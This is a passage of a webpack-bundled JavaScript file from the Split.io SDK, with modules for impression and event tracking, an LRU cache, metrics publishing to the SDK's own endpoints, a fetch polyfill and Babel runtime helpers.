Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/






var log = Object(__WEBPACK_IMPORTED_MODULE_1__utils_logger__["b" /* default */])('splitio-client:impressions-tracker');
/**
 * Checks if impressions previous time should be added or not.
 */

function shouldAddPt(settings) {
  return [__WEBPACK_IMPORTED_MODULE_5__utils_constants__["i" /* PRODUCER_MODE */], __WEBPACK_IMPORTED_MODULE_5__utils_constants__["m" /* STANDALONE_MODE */]].indexOf(settings.mode) > -1 ? true : false;
}
/**
 * Checks if it should dedupe impressions or not.
 */


function shouldBeOptimized(settings) {
  if (!shouldAddPt(settings)) return false;
  return settings.sync.impressionsMode === __WEBPACK_IMPORTED_MODULE_5__utils_constants__["h" /* OPTIMIZED */] ? true : false;
}

function ImpressionsTracker(context) {
  var collector = context.get(context.constants.STORAGE).impressions;
  var settings = context.get(context.constants.SETTINGS);
  var listener = settings.impressionListener;
  var integrationsManager = context.get(context.constants.INTEGRATIONS_MANAGER, true);
  var _settings$runtime = settings.runtime,
      ip = _settings$runtime.ip,
      hostname = _settings$runtime.hostname;
  var sdkLanguageVersion = settings.version;
  var _queue = [];
  var shouldAddPreviousTime = shouldAddPt(settings);
  var isOptimized = shouldBeOptimized(settings);
  var observer = Object(__WEBPACK_IMPORTED_MODULE_3__impressions_observer__["a" /* default */])(); // Instantiates observer

  var impressionsCounter = context.get(context.constants.IMPRESSIONS_COUNTER);
  return {
    queue: function queue(impression, attributes) {
      _queue.push({
        impression: impression,
        attributes: attributes
      });
    },
    track: function track() {
      var impressionsCount = _queue.length;

      var slice = _queue.splice(0, impressionsCount);

      var impressionsToStore = []; // Track only the impressions that are going to be stored
      // Wraps impressions to store and adds previousTime if it corresponds

      slice.forEach(function (_ref) {
        var impression = _ref.impression;

        if (shouldAddPreviousTime) {
          // Adds previous time if it is enabled
          impression.pt = observer.testAndSet(impression);
        }

        var now = Date.now();

        if (isOptimized && impressionsCounter) {
          // Increments impression counter per featureName
          impressionsCounter.inc(impression.feature, now, 1);
        } // Checks if the impression should be added in queue to be sent


        if (!isOptimized || !impression.pt || impression.pt < Object(__WEBPACK_IMPORTED_MODULE_4__utils_time__["a" /* truncateTimeFrame */])(now)) {
          impressionsToStore.push(impression);
        }
      });
      var res = collector.track(impressionsToStore); // If we're on an async storage, handle error and log it.

      if (Object(__WEBPACK_IMPORTED_MODULE_2__utils_promise_thenable__["a" /* default */])(res)) {
        res.then(function () {
          log.debug("Successfully stored " + impressionsCount + " impression" + (impressionsCount === 1 ? '' : 's') + ".");
        }).catch(function (err) {
          log.error("Could not store impressions bulk with " + impressionsCount + " impression" + (impressionsCount === 1 ? '' : 's') + ". Error: " + err);
        });
      }

      if (listener || integrationsManager) {
        var _loop = function _loop(i) {
          var impressionData = {
            // copy of impression, to avoid unexpected behaviour if modified by integrations or impressionListener
            impression: __WEBPACK_IMPORTED_MODULE_0_object_assign___default()({}, slice[i].impression),
            attributes: slice[i].attributes,
            ip: ip,
            hostname: hostname,
            sdkLanguageVersion: sdkLanguageVersion
          }; // Wrap in a timeout because we don't want it to be blocking.

          setTimeout(function () {
            // integrationsManager.handleImpression does not throw errors
            if (integrationsManager) integrationsManager.handleImpression(impressionData);

            try {
              // An exception on the listeners should not break the SDK.
              if (listener) listener.logImpression(impressionData);
            } catch (err) {
              log.error("Impression listener logImpression method threw: " + err + ".");
            }
          }, 0);
        };

        for (var i = 0; i < impressionsCount; i++) {
          _loop(i);
        }
      }
    }
  };
}

/* harmony default export */ __webpack_exports__["a"] = (ImpressionsTracker);

/***/ }),
/* 2828 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__observer__ = __webpack_require__(2829);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__hasher_hashImpression32__ = __webpack_require__(2832);


var LAST_SEEN_CACHE_SIZE = 500; // cache up to 500 impression hashes

var BrowserImpressionObserverFactory = function BrowserImpressionObserverFactory() {
  return new __WEBPACK_IMPORTED_MODULE_0__observer__["a" /* default */](LAST_SEEN_CACHE_SIZE, __WEBPACK_IMPORTED_MODULE_1__hasher_hashImpression32__["a" /* hashImpression32 */]);
};

/* harmony default export */ __webpack_exports__["a"] = (BrowserImpressionObserverFactory);

/***/ }),
/* 2829 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_lrucache_lrucache__ = __webpack_require__(2830);


var ImpressionObserver = /*#__PURE__*/function () {
  function ImpressionObserver(size, hasher) {
    this.cache = new __WEBPACK_IMPORTED_MODULE_0__utils_lrucache_lrucache__["a" /* default */](size);
    this.hasher = hasher;
  }

  var _proto = ImpressionObserver.prototype;

  _proto.testAndSet = function testAndSet(impression) {
    if (!impression) return null;
    var hash = this.hasher(impression);
    var previous = this.cache.get(hash);
    this.cache.set(hash, impression.time);
    return previous;
  };

  return ImpressionObserver;
}();

/* harmony default export */ __webpack_exports__["a"] = (ImpressionObserver);

/***/ }),
/* 2830 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__babel_runtime_helpers_esm_createClass__ = __webpack_require__(1281);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__linkedlist__ = __webpack_require__(2831);



var _Map = typeof Map !== 'undefined' ? Map : /*#__PURE__*/function () {
  // @TODO move this util into its own file
  function MapPoly() {}

  var _proto = MapPoly.prototype;

  _proto.set = function set(key, value) {
    this[key] = value;
  };

  _proto.get = function get(key) {
    return this[key];
  };

  _proto.delete = function _delete(key) {
    delete this[key];
  };

  Object(__WEBPACK_IMPORTED_MODULE_0__babel_runtime_helpers_esm_createClass__["a" /* default */])(MapPoly, [{
    key: "size",
    get: function get() {
      return Object.keys(this).length;
    }
  }]);

  return MapPoly;
}();

var LRUCache = /*#__PURE__*/function () {
  function LRUCache(maxSize) {
    this.maxLen = maxSize || 1;
    this.items = new _Map();
    this.lru = new __WEBPACK_IMPORTED_MODULE_1__linkedlist__["a" /* LinkedList */]();
  }

  var _proto2 = LRUCache.prototype;

  _proto2.get = function get(key) {
    var node = this.items.get(key);
    if (!node || !(node instanceof __WEBPACK_IMPORTED_MODULE_1__linkedlist__["b" /* Node */])) return undefined;
    this.lru.unshiftNode(node); // Move to front

    return node.value.value;
  };

  _proto2.set = function set(key, value) {
    var node = this.items.get(key);

    if (node) {
      if (!(node instanceof __WEBPACK_IMPORTED_MODULE_1__linkedlist__["b" /* Node */])) return false;
      this.lru.unshiftNode(node); // Move to front

      this.lru.head.value.value = value; // Update value
    } else {
      if (this.lru.length === this.maxLen) {
        // Remove last
        var last = this.lru.tail;
        if (!last) return false;
        this.items.delete(last.value.key);
        this.lru.removeNode(this.lru.tail); // Remove node
      }

      this.lru.unshift({
        key: key,
        value: value
      }); // Push front

      this.items.set(key, this.lru.head);
    }

    return true;
  };

  return LRUCache;
}();

/* harmony default export */ __webpack_exports__["a"] = (LRUCache);

/***/ }),
/* 2831 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return Node; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return LinkedList; });
/**
 * yallist implementation based on isaacs/yallist (https://github.com/isaacs/yallist/yallist.js),
 * with the minimal features used by the SDK.

Copyright (c) Isaac Z. Schlueter and Contributors

Permission to use, copy, modify, and/or distribute this software for any
purpose with or without fee is hereby granted, provided that the above
copyright notice and this permission notice appear in all copies.

THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR
IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
**/
var Node = function Node(value, prev, next, list) {
  this.list = list;
  this.value = value;

  if (prev) {
    prev.next = this;
    this.prev = prev;
  } else {
    this.prev = null;
  }

  if (next) {
    next.prev = this;
    this.next = next;
  } else {
    this.next = null;
  }
};
var LinkedList = /*#__PURE__*/function () {
  function LinkedList() {
    this.tail = null;
    this.head = null;
    this.length = 0;
  }

  var _proto = LinkedList.prototype;

  _proto.removeNode = function removeNode(node) {
    if (!node || !(node instanceof Node)) return;

    if (node.list !== this) {
      throw new Error('removing node which does not belong to this list');
    }

    var next = node.next;
    var prev = node.prev;

    if (next) {
      next.prev = prev;
    }

    if (prev) {
      prev.next = next;
    }

    if (node === this.head) {
      this.head = next;
    }

    if (node === this.tail) {
      this.tail = prev;
    }

    node.list.length--;
    node.next = null;
    node.prev = null;
    node.list = null;
    return next;
  };

  _proto.unshiftNode = function unshiftNode(node) {
    if (!node || !(node instanceof Node)) return;

    if (node === this.head) {
      return;
    }

    if (node.list) {
      node.list.removeNode(node);
    }

    var head = this.head;
    node.list = this;
    node.next = head;

    if (head) {
      head.prev = node;
    }

    this.head = node;

    if (!this.tail) {
      this.tail = node;
    }

    this.length++;
  };

  _proto.unshift = function unshift() {
    for (var i = 0, l = arguments.length; i < l; i++) {
      this.head = new Node(arguments[i], null, this.head, this);

      if (!this.tail) {
        this.tail = this.head;
      }

      this.length++;
    }

    return this.length;
  };

  return LinkedList;
}();

/***/ }),
/* 2832 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = hashImpression32;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__engine_engine_murmur3_murmur3__ = __webpack_require__(699);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__buildKey__ = __webpack_require__(2833);


function hashImpression32(impression) {
  return __WEBPACK_IMPORTED_MODULE_0__engine_engine_murmur3_murmur3__["a" /* default */].hash(Object(__WEBPACK_IMPORTED_MODULE_1__buildKey__["a" /* buildKey */])(impression));
}

/***/ }),
/* 2833 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = buildKey;
function buildKey(impression) {
  return impression.keyName + ":" + impression.feature + ":" + impression.treatment + ":" + impression.label + ":" + impression.changeNumber;
}

/***/ }),
/* 2834 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_object_assign__ = __webpack_require__(22);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_object_assign___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_object_assign__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__utils_logger__ = __webpack_require__(9);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__utils_promise_thenable__ = __webpack_require__(75);



var log = Object(__WEBPACK_IMPORTED_MODULE_1__utils_logger__["b" /* default */])('splitio-client:event-tracker');

function EventTracker(context) {
  var collector = context.get(context.constants.STORAGE).events;
  var integrationsManager = context.get(context.constants.INTEGRATIONS_MANAGER, true);

  function queueEventsCallback(eventData, tracked) {
    var eventTypeId = eventData.eventTypeId,
        trafficTypeName = eventData.trafficTypeName,
        key = eventData.key,
        value = eventData.value,
        timestamp = eventData.timestamp,
        properties = eventData.properties; // Logging every prop would be too much.

    var msg = "event of type \"" + eventTypeId + "\" for traffic type \"" + trafficTypeName + "\". Key: " + key + ". Value: " + value + ". Timestamp: " + timestamp + ". " + (properties ? 'With properties.' : 'With no properties.');

    if (tracked) {
      log.info("Successfully queued " + msg);

      if (integrationsManager) {
        // Wrap in a timeout because we don't want it to be blocking.
        setTimeout(function () {
          // copy of event, to avoid unexpected behaviour if modified by integrations
          var eventDataCopy = __WEBPACK_IMPORTED_MODULE_0_object_assign___default()({}, eventData);
          if (eventData.properties) eventDataCopy.properties = __WEBPACK_IMPORTED_MODULE_0_object_assign___default()({}, eventData.properties); // integrationsManager does not throw errors (they are internally handled by each integration module)

          integrationsManager.handleEvent(eventDataCopy);
        }, 0);
      }
    } else {
      log.warn("Failed to queue " + msg);
    }

    return tracked;
  }

  return {
    track: function track(eventData, size) {
      var tracked = collector.track(eventData, size);

      if (Object(__WEBPACK_IMPORTED_MODULE_2__utils_promise_thenable__["a" /* default */])(tracked)) {
        return tracked.then(queueEventsCallback.bind(null, eventData));
      } else {
        return queueEventsCallback(eventData, tracked);
      }
    }
  };
}

/* harmony default export */ __webpack_exports__["a"] = (EventTracker);

/***/ }),
/* 2835 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_logger__ = __webpack_require__(9);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__utils_timeTracker__ = __webpack_require__(278);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__utils_fn_repeat__ = __webpack_require__(700);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__services_metrics__ = __webpack_require__(2836);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__services_metrics_times__ = __webpack_require__(2844);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__services_metrics_counters__ = __webpack_require__(2846);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__services_metrics_dto__ = __webpack_require__(2847);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7__services_impressions__ = __webpack_require__(1285);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8__services_impressions_bulk__ = __webpack_require__(1286);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9__services_impressions_count__ = __webpack_require__(1287);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10__services_impressions_dto__ = __webpack_require__(1288);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_11__Collectors__ = __webpack_require__(2848);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_12__utils_constants__ = __webpack_require__(56);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/













var log = Object(__WEBPACK_IMPORTED_MODULE_0__utils_logger__["b" /* default */])('splitio-metrics');
var IMPRESSIONS_COUNT_RATE = 1800000; // 30 minutes

var MetricsFactory = function MetricsFactory(context) {
  var impressionsRetries = 0;
  var settings = context.get(context.constants.SETTINGS);
  var storage = context.get(context.constants.STORAGE);
  var impressionsCounter = context.get(context.constants.IMPRESSIONS_COUNTER);
  var shouldPushImpressionsCount = settings.sync.impressionsMode === __WEBPACK_IMPORTED_MODULE_12__utils_constants__["h" /* OPTIMIZED */];

  var pushMetrics = function pushMetrics() {
    if (storage.metrics.isEmpty() && storage.count.isEmpty()) return Promise.resolve();
    log.debug('Pushing metrics');
    var latencyTrackerStop = __WEBPACK_IMPORTED_MODULE_1__utils_timeTracker__["a" /* default */].start(__WEBPACK_IMPORTED_MODULE_1__utils_timeTracker__["a" /* default */].TaskNames.METRICS_PUSH); // POST latencies

    var latenciesPromise = storage.metrics.isEmpty() ? null : Object(__WEBPACK_IMPORTED_MODULE_3__services_metrics__["a" /* default */])(Object(__WEBPACK_IMPORTED_MODULE_4__services_metrics_times__["a" /* default */])(settings, {
      body: JSON.stringify(Object(__WEBPACK_IMPORTED_MODULE_6__services_metrics_dto__["b" /* fromLatenciesCollector */])(storage.metrics))
    })).then(function () {
      return storage.metrics.clear();
    }).catch(function () {
      return storage.metrics.clear();
    }); // POST counters

    var countersPromise = storage.count.isEmpty() ? null : Object(__WEBPACK_IMPORTED_MODULE_3__services_metrics__["a" /* default */])(Object(__WEBPACK_IMPORTED_MODULE_5__services_metrics_counters__["a" /* default */])(settings, {
      body: JSON.stringify(Object(__WEBPACK_IMPORTED_MODULE_6__services_metrics_dto__["a" /* fromCountersCollector */])(storage.count))
    })).then(function () {
      return storage.count.clear();
    }).catch(function () {
      return storage.count.clear();
    });
    return Promise.all([latenciesPromise, countersPromise]).then(function (resp) {
      // After both finishes, track the end and return the results
      latencyTrackerStop();
      return resp;
    });
  };

  var pushImpressions = function pushImpressions() {
    if (storage.impressions.isEmpty()) return Promise.resolve();
    var imprCount = storage.impressions.queue.length;
    log.info("Pushing " + imprCount + " impressions");
    var latencyTrackerStop = __WEBPACK_IMPORTED_MODULE_1__utils_timeTracker__["a" /* default */].start(__WEBPACK_IMPORTED_MODULE_1__utils_timeTracker__["a" /* default */].TaskNames.IMPRESSIONS_PUSH);
    return Object(__WEBPACK_IMPORTED_MODULE_7__services_impressions__["a" /* default */])(Object(__WEBPACK_IMPORTED_MODULE_8__services_impressions_bulk__["a" /* default */])(settings, {
      body: JSON.stringify(Object(__WEBPACK_IMPORTED_MODULE_10__services_impressions_dto__["a" /* fromImpressionsCollector */])(storage.impressions, settings))
    })).then(function () {
      impressionsRetries = 0;
      storage.impressions.clear();
    }).catch(function (err) {
      if (impressionsRetries) {
        // For now we retry only once.
        log.warn("Droping " + imprCount + " impressions after retry. Reason " + err + ".");
        impressionsRetries = 0;
        storage.impressions.clear();
      } else {
        impressionsRetries++;
        log.warn("Failed to push " + imprCount + " impressions, keeping data to retry on next iteration. Reason " + err + ".");
      }
    }).then(function () {
      return latencyTrackerStop();
    });
  };

  var pushImpressionsCount = function pushImpressionsCount() {
    var pf = Object(__WEBPACK_IMPORTED_MODULE_10__services_impressions_dto__["b" /* fromImpressionsCountCollector */])(impressionsCounter);
    var imprCounts = pf.length;
    if (imprCounts === 0) return Promise.resolve();
    log.info("Pushing count of impressions for " + imprCounts + " features");
    return Object(__WEBPACK_IMPORTED_MODULE_7__services_impressions__["a" /* default */])(Object(__WEBPACK_IMPORTED_MODULE_9__services_impressions_count__["a" /* default */])(settings, {
      body: JSON.stringify({
        pf: pf
      })
    })).then(function () {
      impressionsRetries = 0;
    }).catch(function (err) {
      if (impressionsRetries) {
        // For now we retry only once.
        log.warn("Droping count of impressions for " + imprCounts + " features after retry. Reason " + err + ".");
        impressionsRetries = 0;
      } else {
        impressionsRetries++;
        log.warn("Failed to push impressions count for " + imprCounts + " features, keeping data to retry on next iteration. Reason " + err + ".");
      }
    });
  };

  var stopImpressionsPublisher = false;
  var stopPerformancePublisher = false;
  var stopImpressionsCountPublisher = false;
  return {
    start: function start() {
      stopImpressionsPublisher = Object(__WEBPACK_IMPORTED_MODULE_2__utils_fn_repeat__["a" /* default */])(function (schedulePublisher) {
        return pushImpressions().then(function () {
          return schedulePublisher();
        });
      }, settings.scheduler.impressionsRefreshRate);
      stopPerformancePublisher = Object(__WEBPACK_IMPORTED_MODULE_2__utils_fn_repeat__["a" /* default */])(function (schedulePublisher) {
        return pushMetrics().then(function () {
          return schedulePublisher();
        });
      }, settings.scheduler.metricsRefreshRate);

      if (shouldPushImpressionsCount) {
        stopImpressionsCountPublisher = Object(__WEBPACK_IMPORTED_MODULE_2__utils_fn_repeat__["a" /* default */])(function (schedulePublisher) {
          return pushImpressionsCount().then(function () {
            return schedulePublisher();
          });
        }, IMPRESSIONS_COUNT_RATE);
      }
    },
    flush: function flush() {
      if (shouldPushImpressionsCount) pushImpressionsCount();
      return pushImpressions();
    },
    stop: function stop() {
      stopImpressionsPublisher && stopImpressionsPublisher();
      stopPerformancePublisher && stopPerformancePublisher();
      stopImpressionsCountPublisher && stopImpressionsCountPublisher();
    },
    // Metrics collectors
    collectors: {
      segmentChanges: new __WEBPACK_IMPORTED_MODULE_11__Collectors__["c" /* SegmentChangesCollector */](storage),
      splitChanges: new __WEBPACK_IMPORTED_MODULE_11__Collectors__["d" /* SplitChangesCollector */](storage),
      mySegments: new __WEBPACK_IMPORTED_MODULE_11__Collectors__["b" /* MySegmentsCollector */](storage),
      client: new __WEBPACK_IMPORTED_MODULE_11__Collectors__["a" /* ClientCollector */](storage)
    }
  };
};

/* harmony default export */ __webpack_exports__["a"] = (MetricsFactory);

/***/ }),
/* 2836 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__transport__ = __webpack_require__(279);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/

/* harmony default export */ __webpack_exports__["a"] = (__WEBPACK_IMPORTED_MODULE_0__transport__["a" /* default */]);

/***/ }),
/* 2837 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = getFetch;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_unfetch__ = __webpack_require__(2838);

function getFetch() {
  return typeof fetch === 'function' ? fetch : __WEBPACK_IMPORTED_MODULE_0_unfetch__["a" /* default */];
}

/***/ }),
/* 2838 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony default export */ __webpack_exports__["a"] = (function(e,n){return n=n||{},new Promise(function(t,r){var s=new XMLHttpRequest,o=[],u=[],i={},a=function(){return{ok:2==(s.status/100|0),statusText:s.statusText,status:s.status,url:s.responseURL,text:function(){return Promise.resolve(s.responseText)},json:function(){return Promise.resolve(s.responseText).then(JSON.parse)},blob:function(){return Promise.resolve(new Blob([s.response]))},clone:a,headers:{keys:function(){return o},entries:function(){return u},get:function(e){return i[e.toLowerCase()]},has:function(e){return e.toLowerCase()in i}}}};for(var l in s.open(n.method||"get",e,!0),s.onload=function(){s.getAllResponseHeaders().replace(/^(.*?):[^\S\n]*([\s\S]*?)$/gm,function(e,n,t){o.push(n=n.toLowerCase()),u.push([n,t]),i[n]=i[n]?i[n]+","+t:t}),t(a())},s.onerror=r,s.withCredentials="include"==n.credentials,n.headers)s.setRequestHeader(l,n.headers[l]);s.send(n.body||null)})});
//# sourceMappingURL=unfetch.module.js.map


/***/ }),
/* 2839 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = _wrapNativeSuper;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__getPrototypeOf_js__ = __webpack_require__(2840);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__setPrototypeOf_js__ = __webpack_require__(697);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__isNativeFunction_js__ = __webpack_require__(2841);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__construct_js__ = __webpack_require__(2842);




function _wrapNativeSuper(Class) {
  var _cache = typeof Map === "function" ? new Map() : undefined;

  _wrapNativeSuper = function _wrapNativeSuper(Class) {
    if (Class === null || !Object(__WEBPACK_IMPORTED_MODULE_2__isNativeFunction_js__["a" /* default */])(Class)) return Class;

    if (typeof Class !== "function") {
      throw new TypeError("Super expression must either be null or a function");
    }

    if (typeof _cache !== "undefined") {
      if (_cache.has(Class)) return _cache.get(Class);

      _cache.set(Class, Wrapper);
    }

    function Wrapper() {
      return Object(__WEBPACK_IMPORTED_MODULE_3__construct_js__["a" /* default */])(Class, arguments, Object(__WEBPACK_IMPORTED_MODULE_0__getPrototypeOf_js__["a" /* default */])(this).constructor);
    }

    Wrapper.prototype = Object.create(Class.prototype, {
      constructor: {
        value: Wrapper,
        enumerable: false,
        writable: true,
        configurable: true
      }
    });
    return Object(__WEBPACK_IMPORTED_MODULE_1__setPrototypeOf_js__["a" /* default */])(Wrapper, Class);
  };

  return _wrapNativeSuper(Class);
}

/***/ }),
/* 2840 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = _getPrototypeOf;
function _getPrototypeOf(o) {
  _getPrototypeOf = Object.setPrototypeOf ? Object.getPrototypeOf : function _getPrototypeOf(o) {
    return o.__proto__ || Object.getPrototypeOf(o);
  };
  return _getPrototypeOf(o);
}

/***/ }),
/* 2841 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = _isNativeFunction;
function _isNativeFunction(fn) {
  return Function.toString.call(fn).indexOf("[native code]") !== -1;
}

/***/ }),
/* 2842 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = _construct;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__setPrototypeOf_js__ = __webpack_require__(697);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__isNativeReflectConstruct_js__ = __webpack_require__(2843);


function _construct(Parent, args, Class) {
  if (Object(__WEBPACK_IMPORTED_MODULE_1__isNativeReflectConstruct_js__["a" /* default */])()) {
    _construct = Reflect.construct;
  } else {
    _construct = function _construct(Parent, args, Class) {
      var a = [null];
      a.push.apply(a, args);
      var Constructor = Function.bind.apply(Parent, a);
      var instance = new Constructor();
      if (Class) Object(__WEBPACK_IMPORTED_MODULE_0__setPrototypeOf_js__["a" /* default */])(instance, Class.prototype);
      return instance;
    };
  }

  return _construct.apply(null, arguments);
}

/***/ }),
/* 2843 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = _isNativeReflectConstruct;
function _isNativeReflectConstruct() {
  if (typeof Reflect === "undefined" || !Reflect.construct) return false;
  if (Reflect.construct.sham) return false;
  if (typeof Proxy === "function") return true;

  try {
    Boolean.prototype.valueOf.call(Reflect.construct(Boolean, [], function () {}));
    return true;
  } catch (e) {
    return false;
  }
}

/***/ }),
/* 2844 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = POST;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_object_assign__ = __webpack_require__(22);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_object_assign___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_object_assign__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__request__ = __webpack_require__(203);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/


function POST(settings, params) {
  return Object(__WEBPACK_IMPORTED_MODULE_1__request__["a" /* default */])(settings, '/metrics/times', __WEBPACK_IMPORTED_MODULE_0_object_assign___default()({
    method: 'POST'
  }, params, {
    logErrorsAsInfo: true
  }));
}

/***/ }),
/* 2845 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = getOptions;
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/
function getOptions() {
  return {};
}

/***/ }),
/* 2846 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = POST;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_object_assign__ = __webpack_require__(22);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_object_assign___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_object_assign__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__request__ = __webpack_require__(203);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/


function POST(settings, params) {
  return Object(__WEBPACK_IMPORTED_MODULE_1__request__["a" /* default */])(settings, '/metrics/counters', __WEBPACK_IMPORTED_MODULE_0_object_assign___default()({
    method: 'POST'
  }, params, {
    logErrorsAsInfo: true
  }));
}

/***/ }),
/* 2847 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["b"] = fromLatenciesCollector;
/* harmony export (immutable) */ __webpack_exports__["a"] = fromCountersCollector;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_lang__ = __webpack_require__(13);
/**
Copyright 2016 Split Software

